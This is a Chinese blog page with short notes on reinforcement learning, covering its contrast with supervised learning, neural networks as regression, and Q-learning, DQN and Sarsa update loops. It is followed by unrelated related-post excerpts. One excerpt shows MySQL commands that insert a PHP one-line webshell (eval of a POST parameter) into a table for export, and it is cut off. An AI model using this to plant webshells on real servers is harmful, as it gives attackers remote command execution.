一句話交待強化學習在做什麼

2021-09-29 09:29:08 字數 1418 閱讀 7849

正文前的兩個問題: 

一、強化學習與監督非監督學習的區別:

1、從策略更新依據的角度說(標籤還是獎勵):

監督學習,人知道什麼是對的,並標籤資料。 非監督學習,人知道什麼是對的,沒有完全標籤資料。

強化學習,人不知道什麼是對的,不知道要怎樣做,但可以評價智慧型體與環境互動的好不好,設定獎勵。

2、狀態空間到策略空間的難度(神經網路的作用):

深度學習用大量的卷積神經網路處理理解feature map,建立基於特徵理解的對映。

強化學習使用神經網路一般是做資料降維用的,使用的比較簡單,對特徵不敏感。

二、神經網路既可以做特徵圖理解,又可以做資料降維,本質是多項式回歸?

1、回歸分析用數學表示式來描述變數間的相關關係,通常是學習**資料模型的第乙個演算法。

(相關區別於變數間確定性的函式關係。感性認識是曲線擬合點集。)

2、線性回歸:擬合直線,

邏輯回歸:因變數二元(真/假)。

多項式回歸:自變數指數大於1。

多元回歸:自變數數量大於等於2。

參考博文:

神經網路本質是多項式回歸

3、神經網路的優勢:

1.神經網路屬於自適應能力很強的方法;

2.對於任意給定的函式,神經網路都能夠無限逼近,這是因為在分類的整個過程中,神經網路通過調整權值不斷地明確分類所依據的精確關係;

3.神經網路屬於非線性模型,這使得它能夠靈活地模擬現實世界中的資料之間的複雜關係。

參考:隨機q表

初始化狀態

根據ε-貪婪策略和q表選擇行為、行動獲得獎勵、更新q表(老估計q+係數*差距)、更新狀態、迴圈。

1、複雜問題q表龐大

2、off-policy,選動作時(決策、生成樣本)用ε-貪婪策略,更新q表時(計算下一狀態預期收益)用貪婪策略(max估計)

隨機神經網路

初始化狀態

根據貪婪策略和神經網路計算估計q值選擇行為、行動到達新位置獲得獎勵、更新神經網路(老神經網路係數+係數*差        距)、狀態加

一、迴圈。

1、使用狀態和動作作為神經網路的輸入、估計動作的q值

隨機q表

初始化狀態、根據貪婪策略和q表選擇行為

行動獲得獎勵、根據貪婪策略和q表選擇下一步行為,更新q表(老估計q+係數*差距)、更新狀態動作、迴圈。

1、on-policy,選動作時用ε-貪婪策略,更新q表時(用當前策略估計下一步收益)用ε-貪婪策略

mysql 匯出一句話 MySQL 匯出一句話

drop table if exists temp 如果存在temp就刪掉 create table temp cmd text not null 建立temp表,裡面就乙個cmd欄位 insert into temp cmd values php eval post cmd 把一句話木馬插入到te...

一句話提醒

1 在c 中,父窗體要訪問子窗體變數,需將子窗體變數設為public才能訪問。2 每 5 秒重新整理頁面 5 秒後重定向頁面 3 block 此元素將顯示為塊級元素,此元素前後會帶有換行符。inline 預設。此元素會被顯示為內聯元素,元素前後沒有換行符。4 document.getelementb...

一句話命令

bash 型別 wget r nc np 分片20m 上傳 bypy vvv s 20m upload mac下檢視埠占用 nettop nm tcp brew brew uninstall zsh brew services list brew services start brew servic...